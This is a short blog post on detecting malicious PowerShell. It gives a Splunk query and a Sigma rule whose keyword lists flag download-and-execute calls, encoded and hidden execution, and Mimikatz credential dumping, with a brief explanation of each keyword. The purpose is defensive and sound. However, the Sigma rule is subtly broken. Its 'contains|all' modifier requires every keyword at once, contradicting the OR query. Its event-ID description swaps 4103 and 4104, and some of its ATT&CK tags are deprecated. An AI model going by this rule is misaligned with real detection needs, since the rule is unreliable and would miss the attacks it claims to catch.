Sign in Subscribe

Detecting Suspicious Powershell commands

Damian Perera

2 min read
Share
Detecting Suspicious Powershell commands

Detection query: Written in SPL (Search Processing Language) for Splunk

index=* (EventCode=4104 OR EventCode=4103)
(ScriptBlockText="*Invoke-Expression*" OR 
 ScriptBlockText="*IEX*" OR 
 ScriptBlockText="*DownloadString*" OR 
 ScriptBlockText="*DownloadFile*" OR 
 ScriptBlockText="*Net.WebClient*" OR 
 ScriptBlockText="*Start-Process*" OR 
 ScriptBlockText="*-EncodedCommand*" OR 
 ScriptBlockText="*-enc*" OR 
 ScriptBlockText="*bypass*" OR 
 ScriptBlockText="*-nop*" OR 
 ScriptBlockText="*hidden*" OR
 ScriptBlockText="*Invoke-Mimikatz*" OR
 ScriptBlockText="*Invoke-ReflectivePEInjection*")
| table _time, host, user, ScriptBlockText
| sort -_time

Explanation:

This query detects the use of malicious powershell use on your system

Invoke-Expression: Runs a string as a command or expression 

IEX: Alias for Invoke-Expression

DownloadString: Used in fileless attacks to download and execute scripts or payloads directly into memory without writing to disk first

Net.WebClient/DownloadFile: Used to download malicious payloads from the internet 

Start-Process: Used in attack chains after downloading malicious payloads and to execute malware with specific parameters, launch processes with elevated privileges, run processes hidden from the user, and establish persistence or lateral movement 

EncodedCommand: Used to obfuscate malicious Powershell commands and evade detection  

-enc: Alias for EncodedCommand

bypass: Disables PowerShell’s execution policy, which would usually restrict running unsigned or untrusted scripts 

-nop: Alias for -NoProfile, used to prevent PowerShell from loading user and system profile scripts at startup. Used to avoid logging, evade detection and ensure consistency (Malicious code runs without interference from profile configurations

Hidden: Prevents PowerShell windows from appearing on screen. Allows attackers stealth execution, reduce suspicion and enables fileless attacks

Invoke-Mimikatz: Invokes the Mimikatz credential dumping tool which allows extraction of plaintext passwords, NTLM hashes, Kerberos tickets, and other credentials directly from memory

Invoke-ReflectivePEInjection: Loads Windows Portable Executable files like DLLs and EXEs directly into memory without writing them to disk. 

Use the following SIGMA rule to convert this query to your preferred query language:

title: Suspicious PowerShell ScriptBlock (Encoded, Download, IEX, Mimikatz, PE Injection)
id: a1b2c3d4-5e6f-7a89-b0c1-d2e3f4567890
status: experimental
description: |
  Detects PowerShell script‑block logging events (EventCode 4103/4104) that contain
  common malicious operators such as encoded commands, IEX, web‑client downloads,
  hidden execution, or the execution of known post‑exploitation modules
  (e.g., Invoke‑Mimikatz, Invoke‑ReflectivePEInjection).  This rule is useful for
  early detection of living‑off‑the‑land binaries (LOLBins) and credential‑dumping
  attempts that leverage PowerShell.
author: Damian Perera
date: 2026-01-03
logsource:
  product: windows
  service: powershell
  definition: 'PowerShell Script Block Logging (Event ID 4103) and Module Logging (Event ID 4104)'
detection:
  selection_event:
    EventID|contains:
      - 4103
      - 4104
  selection_keywords:
    ScriptBlockText|contains|all:
      - '*Invoke-Expression*'
      - '*IEX*'
      - '*DownloadString*'
      - '*DownloadFile*'
      - '*Net.WebClient*'
      - '*Start-Process*'
      - '*-EncodedCommand*'
      - '*-enc*'
      - '*bypass*'
      - '*-nop*'
      - '*hidden*'
      - '*Invoke-Mimikatz*'
      - '*Invoke-ReflectivePEInjection*'
  condition: selection_event and selection_keywords
fields:
  - _time
  - host
  - user
  - ScriptBlockText
falsepositives:
  - Legitimate administrative scripts that use encoded commands or web‑client
    downloads (e.g., software deployment, patching).  Review context and source
    before triggering.
level: high
tags:
  - attack.execution
  - attack.t1059.001      # Command and Scripting Interpreter: PowerShell
  - attack.t1086          # PowerShell (legacy)
  - attack.t1003.001      # OS Credential Dumping: LSASS Memory (for Invoke‑Mimikatz)
  - attack.t1064          # Scripting (deprecated)
  - attack.t1055.001      # Process Injection (Reflective PE Injection)
  - attack.t1027          # Obfuscated/Stored Files (EncodedCommand, -enc)
  - mitre
  - sigma

Sign up for more like this.

Enter your email
Subscribe